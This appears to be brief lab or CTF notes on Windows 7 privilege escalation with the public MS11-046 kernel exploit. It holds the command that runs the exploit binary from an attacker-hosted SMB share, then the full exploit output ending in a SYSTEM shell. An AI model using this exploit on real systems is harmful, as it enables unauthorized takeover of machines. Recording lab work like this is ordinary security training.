4 privesc_2 ms11-046

Using https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046

c:\Users\Public\Downloads> \\10.10.14.2\drive\MS11-046.exe

c:\Windows\System32> whoami
nt authority\system
exit

# shows after exit
[*] MS11-046 (CVE-2011-1249) x86 exploit
   [*] by Tomislav Paskalev
[*] Identifying OS
   [+] 32-bit
   [+] Windows 7
[*] Locating required OS components
   [+] ntkrnlpa.exe
      [*] Address:      0x8281b000
      [*] Offset:       0x00850000
      [+] HalDispatchTable
         [*] Offset:    0x009793b8
   [+] NtQueryIntervalProfile
      [*] Address:      0x77535510
   [+] ZwDeviceIoControlFile
      [*] Address:      0x77534ca0
[*] Setting up exploitation prerequisite
   [*] Initialising Winsock DLL
      [+] Done
      [*] Creating socket
         [+] Done
         [*] Connecting to closed port
            [+] Done
[*] Creating token stealing shellcode
   [*] Shellcode assembled
   [*] Allocating memory
      [+] Address:      0x02070000
      [*] Shellcode copied
[*] Exploiting vulnerability
   [*] Sending AFD socket connect request
      [+] Done
      [*] Elevating privileges to SYSTEM
         [+] Done
         [*] Spawning shell

Last updated